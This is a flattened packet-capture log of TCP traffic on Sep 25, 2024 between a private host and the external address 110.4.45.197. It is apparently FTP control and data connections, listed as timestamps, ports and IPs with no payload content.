                              Sep 25, 2024 14:42:49.814888954 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.817501068 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.822446108 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.657113075 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.657381058 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:50.657426119 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:50.662185907 CEST6077955432110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.662513018 CEST6077955432110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.662565947 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:50.701482058 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:50.996732950 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.997369051 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:51.002423048 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:51.330818892 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:51.331338882 CEST5543360205192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:51.336314917 CEST6020555433110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:51.336386919 CEST5543360205192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:51.336488008 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:51.341357946 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.186347008 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.187323093 CEST5543360205192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:52.192653894 CEST6020555433110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.192773104 CEST5543360205192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:52.232615948 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:52.600034952 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.600404978 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:52.605443954 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.978665113 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.979338884 CEST6475650701192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.001146078 CEST5070164756110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.001272917 CEST6475650701192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.001554966 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.009335995 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.906737089 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.907077074 CEST6475650701192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.920011997 CEST5070164756110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.921340942 CEST5070164756110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.921406031 CEST6475650701192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.951358080 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:54.273318052 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:54.326323032 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:56.065356970 CEST6502421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:56.095133066 CEST2165024110.4.45.197192.168.2.9
                              Sep 25, 2024 14:43:56.095269918 CEST6502421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:56.095596075 CEST6502421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:56.126966953 CEST2165024110.4.45.197192.168.2.9
                              Sep 25, 2024 14:43:56.127042055 CEST6502421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:59.851809025 CEST6502521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:59.874130011 CEST2165025110.4.45.197192.168.2.9
                              Sep 25, 2024 14:43:59.874233007 CEST6502521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:59.874547005 CEST6502521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:59.910603046 CEST2165025110.4.45.197192.168.2.9
                              Sep 25, 2024 14:43:59.910676003 CEST6502521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:10.279552937 CEST6502621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:10.285670996 CEST2165026110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:10.289047003 CEST6502621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:10.292882919 CEST6502621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:10.298048019 CEST2165026110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:10.301027060 CEST6502621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:13.491029978 CEST6502721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:13.496404886 CEST2165027110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:13.496479034 CEST6502721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:13.499854088 CEST6502721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:13.504887104 CEST2165027110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:13.505044937 CEST6502721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:18.747637033 CEST6502821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:18.752618074 CEST2165028110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:18.752832890 CEST6502821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:18.752950907 CEST6502821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:18.758033991 CEST2165028110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:18.758214951 CEST6502821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:23.896459103 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:23.903240919 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:23.903312922 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:24.828048944 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:24.831254959 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:24.836222887 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.193777084 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.199153900 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:25.204085112 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.588510990 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.588809013 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:25.593749046 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.698460102 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:25.703501940 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.703572989 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.016300917 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.016527891 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.021433115 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.393462896 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.395428896 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.402354956 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.607925892 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.611191988 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.616337061 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.777072906 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.777359962 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.782303095 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.000193119 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.000380993 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.006774902 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.156686068 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.160962105 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.166163921 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.169065952 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.169186115 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.174371004 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.466305971 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.466516972 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.472191095 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.876199961 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.876458883 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.077284098 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.077353001 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.078520060 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.106301069 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.106583118 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111450911 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111460924 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111500978 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111524105 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111542940 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111552954 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111599922 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111601114 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111608982 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111664057 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111673117 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111675978 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111738920 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111758947 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111768961 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111815929 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.116396904 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116406918 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116415977 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116425037 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116435051 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116446018 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116456032 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.116499901 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.116527081 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116549969 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116566896 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116584063 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.116600990 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.116605997 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116633892 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.116657972 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.116669893 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116683006 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116718054 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116729021 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.121344090 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.121462107 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.121520042 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.121563911 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.121695995 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.121751070 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.122061968 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.122114897 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.232988119 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.407121897 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.407294989 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.412193060 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.742332935 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.745111942 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.749947071 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.917994022 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:29.029881954 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:29.085597038 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:29.087069035 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:29.092267990 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:29.093041897 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:29.093226910 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:29.098062992 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.056008101 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.056302071 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.061214924 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061230898 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061248064 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061281919 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.061305046 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061319113 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061326027 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.061382055 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.061494112 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061506987 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061534882 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061547041 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061559916 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.061583996 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.061634064 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066179037 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066193104 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066241980 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066245079 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066258907 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066270113 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066283941 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066288948 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066297054 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066308022 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066332102 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066334963 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066376925 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066385984 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066385984 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066432953 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066458941 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066504002 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066514969 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066551924 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066560030 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066612005 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.066643953 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.066693068 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.071069002 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.071131945 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.071803093 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.071913958 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.076100111 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.076944113 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.076960087 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.076988935 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.077039957 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.077053070 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.077084064 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.077491999 CEST6380965032110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:30.077543974 CEST6503263809192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:30.233002901 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:31.057775021 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:31.232999086 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:32.194961071 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:32.200006962 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:32.304294109 CEST6503321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:32.309509993 CEST2165033110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:32.311258078 CEST6503321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:32.315213919 CEST6503321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:32.320136070 CEST2165033110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:32.321121931 CEST6503321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:32.538887978 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:32.539707899 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:32.544519901 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:32.547156096 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:32.547243118 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:32.552234888 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.451342106 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.451662064 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.456717968 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456732035 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456752062 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456760883 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456769943 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456774950 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456792116 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456796885 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.456825018 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.456856012 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456866026 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456867933 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.456883907 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.456940889 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.461661100 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.461683035 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.461703062 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.461713076 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.461713076 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.461724997 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.461730003 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.461760044 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.461783886 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.461802006 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.461812019 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.461858034 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.461936951 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.461977959 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.461996078 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.462050915 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.462052107 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.462063074 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.462100983 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.462117910 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.462125063 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.462182045 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.466599941 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.466710091 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.466762066 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.466793060 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.466909885 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.466986895 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.466995955 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467031956 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467099905 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467142105 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467153072 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467204094 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467212915 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467216969 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467226982 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467539072 CEST5932665034110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:33.467593908 CEST6503459326192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:33.529872894 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:34.383814096 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:34.532974005 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:54.555052996 CEST6503521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:54.560102940 CEST2165035110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:54.563555002 CEST6503521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:54.570485115 CEST6503521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:54.576594114 CEST2165035110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:54.579545021 CEST6503521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:57.900409937 CEST6503621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:57.910686016 CEST2165036110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:57.910758972 CEST6503621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:57.910969973 CEST6503621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:57.917752981 CEST2165036110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:57.917810917 CEST6503621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:58.881128073 CEST6503721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:58.918741941 CEST2165037110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:58.921165943 CEST6503721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:58.921309948 CEST6503721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:58.927155972 CEST2165037110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:58.929164886 CEST6503721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:00.543487072 CEST6503821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:00.550606966 CEST2165038110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:00.550718069 CEST6503821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:00.551301003 CEST6503821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:00.558691025 CEST2165038110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:00.558768034 CEST6503821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:08.817389965 CEST6503921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:08.843739033 CEST2165039110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:08.844121933 CEST6503921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:08.844360113 CEST6503921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:08.867490053 CEST2165039110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:08.867549896 CEST6503921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:20.583061934 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:20.587987900 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:20.589262009 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:22.031651020 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:22.031836033 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:22.031975031 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:22.032046080 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:22.032416105 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:22.032474995 CEST6504021192.168.2.9110.4.45.197
